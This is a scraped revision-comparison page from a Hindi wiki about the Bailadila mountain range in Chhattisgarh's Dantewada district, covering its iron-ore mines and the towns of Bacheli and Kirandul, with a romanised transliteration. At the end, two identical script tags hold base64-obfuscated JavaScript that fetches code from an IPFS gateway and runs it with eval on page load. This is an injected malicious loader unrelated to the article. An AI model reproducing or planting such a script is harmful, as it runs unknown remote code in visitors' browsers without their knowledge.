Difference between revisions of "बैलाडि‍ला पर्वत श्रृंखला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "श्रृंखला" to "शृंखला")
m (Text replacement - "शृंखला" to "श्रृंखला")
 
Line 1: Line 1:
'''बैलाडि‍ला पर्वत शृंखला''' [[छत्तीसगढ़]] राज्य के [[दन्तेवाड़ा ज़िला|दन्तेवाड़ा ज़िले]] में स्थित है।
+
'''बैलाडि‍ला पर्वत श्रृंखला''' [[छत्तीसगढ़]] राज्य के [[दन्तेवाड़ा ज़िला|दन्तेवाड़ा ज़िले]] में स्थित है।
*बैलाडि‍ला पर्वत शृंखला में उच्च गुणवत्ता के लौह अयस्क की 14 खदानें हैं जो बैलाड़िला की पहचान बन चुकी हैं।  
+
*बैलाडि‍ला पर्वत श्रृंखला में उच्च गुणवत्ता के लौह अयस्क की 14 खदानें हैं जो बैलाड़िला की पहचान बन चुकी हैं।  
*बैलाडि‍ला पर्वत शृंखला का आकार बैल के कूबड़ के समान है। इसी कारण इसका नाम बैलाडि‍ला रखा गया है।  
+
*बैलाडि‍ला पर्वत श्रृंखला का आकार बैल के कूबड़ के समान है। इसी कारण इसका नाम बैलाडि‍ला रखा गया है।  
 
*यहाँ पाई जाने वाली खदानें इसकी अर्थव्यवस्था में मुख्य भूमिका निभाती हैं। इसलिए सरकार ने पूरे क्षेत्र को दो औद्योगिक क्षेत्रों में विभाजित कर दिया है।  
 
*यहाँ पाई जाने वाली खदानें इसकी अर्थव्यवस्था में मुख्य भूमिका निभाती हैं। इसलिए सरकार ने पूरे क्षेत्र को दो औद्योगिक क्षेत्रों में विभाजित कर दिया है।  
 
*इन क्षेत्रों के नाम बचेली और किरनडुल हैं।  
 
*इन क्षेत्रों के नाम बचेली और किरनडुल हैं।  
 
*दंतेवाड़ा से बचेली 29 किमी और किरनडुल 41 किमी की दूरी पर स्थित है।
 
*दंतेवाड़ा से बचेली 29 किमी और किरनडुल 41 किमी की दूरी पर स्थित है।
*बैलाडि‍ला की खदानें पर्वत शृंखला की सबसे ऊंची चोटी आकाश नगर पर स्थित हैं।
+
*बैलाडि‍ला की खदानें पर्वत श्रृंखला की सबसे ऊंची चोटी आकाश नगर पर स्थित हैं।
 
*इसकी यात्रा पर जाने से पहले राष्ट्रीय खनिज विकास निगम की अनुमति लेनी पड़ती है।  
 
*इसकी यात्रा पर जाने से पहले राष्ट्रीय खनिज विकास निगम की अनुमति लेनी पड़ती है।  
 
*आकाश नगर की यात्रा के दौरान पर्यटक नीली रेत देख सकते हैं।  
 
*आकाश नगर की यात्रा के दौरान पर्यटक नीली रेत देख सकते हैं।  

Latest revision as of 11:49, 9 February 2021

bailadi‍la parvat shrriankhala chhattisagadh rajy ke danteva da zile mean sthit hai.

  • bailadi‍la parvat shrriankhala mean uchch gunavatta ke lauh ayask ki 14 khadanean haian jo baila dila ki pahachan ban chuki haian.
  • bailadi‍la parvat shrriankhala ka akar bail ke koob d ke saman hai. isi karan isaka nam bailadi‍la rakha gaya hai.
  • yahaan paee jane vali khadanean isaki arthavyavastha mean mukhy bhoomika nibhati haian. isalie sarakar ne poore kshetr ko do audyogik kshetroan mean vibhajit kar diya hai.
  • in kshetroan ke nam bacheli aur kiranadul haian.
  • danteva da se bacheli 29 kimi aur kiranadul 41 kimi ki doori par sthit hai.
  • bailadi‍la ki khadanean parvat shrriankhala ki sabase ooanchi choti akash nagar par sthit haian.
  • isaki yatra par jane se pahale rashtriy khanij vikas nigam ki anumati leni p dati hai.
  • akash nagar ki yatra ke dauran paryatak nili ret dekh sakate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>